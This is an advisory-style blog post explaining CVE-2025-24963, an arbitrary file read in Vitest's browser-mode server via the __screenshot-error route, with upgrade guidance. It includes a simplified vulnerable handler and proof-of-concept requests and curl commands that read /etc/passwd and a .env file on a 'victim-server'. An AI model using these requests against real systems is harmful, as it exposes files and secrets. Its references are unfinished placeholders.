Vitest is a popular lightning-fast unit test framework powered by Vite. Recently, CVE-2025-24963 revealed a serious vulnerability that could let attackers read any file from your machine—if you’re running a misconfigured Vitest server. Here’s what you need to know, including how the problem happens, how it can be exploited, and how to fix it. All in plain language.

What Is the Problem?

In Vitest, when you run vitest --browser, it spins up an internal HTTP server for working with browser-based tests. To make troubleshooting easier, the server exposes a special handler called __screenshot-error. Originally, this route was only supposed to help with debugging failed screenshots.

But: A code change (commit 2d62051, May 2024) made it so this handler would respond with the contents of _any file_ asked for via the URL.

If your server is exposed on the network with browser.api.host: true, any computer on the internet can ask to see files—like source code, configs, or secret keys.

How the Exploit Works

Whenever the Vitest browser server is started with network exposure (browser.api.host: true), it binds to all network interfaces, so any host that can reach the machine can send it requests.

The vulnerable code lets an HTTP request like this one fetch any file the server process can read:

GET /__screenshot-error?filename=/etc/passwd

Or, on Windows:

GET /__screenshot-error?filename=C:\Windows\System32\drivers\etc\hosts

Here’s a simplified version of the route handler:

```js
// Simplified, Express-style illustration of the vulnerable route
// (not Vitest's exact source). The filename comes straight from the
// query string and is handed to fs.readFile without any restriction.
const express = require('express')
const fs = require('node:fs')

const app = express()

// inside the browser server route handler
app.get('/__screenshot-error', (req, res) => {
  const filename = decodeURIComponent(req.query.filename) // attacker-controlled
  fs.readFile(filename, 'utf-8', (err, content) => {
    if (err) {
      res.status(404).send('Not found')
    } else {
      res.type('text/plain').send(content)
    }
  })
})
```

> ✅ Fixed in: Vitest 2.1.9 and 3.0.4 (GitHub diff for the fix)

The same requests issued with curl:

```bash
curl "http://victim-server:51204/__screenshot-error?filename=/etc/passwd"
```

```bash
curl "http://victim-server:51204/__screenshot-error?filename=/home/ubuntu/.env"
```

Who Is at Risk?

- Anyone running Vitest in browser mode on a public networked server with browser.api.host: true.

How To Fix CVE-2025-24963

There is no workaround: the only solution is to upgrade Vitest to one of the fixed releases, 2.1.9 or 3.0.4.

Get them here: npmjs.com/package/vitest

> To upgrade:
>
> ```bash
> npm install vitest@^2.1.9
> # or
> npm install vitest@^3.0.4
> ```

Additionally, never expose your test servers to the public internet unless you absolutely need to.

Timeline

- Vulnerability introduced: Commit 2d62051

References

- GitHub Vitest Security Advisory (placeholder; use official link when available)
- Mitre CVE Record for CVE-2025-24963 (once published)
- Diff showing the fix
- Commit that introduced the bug

Summary

- If you use Vitest with browser.api.host: true, anyone can fetch any file if you have not upgraded.

Published on: 02/04/2025 20:15:50 UTC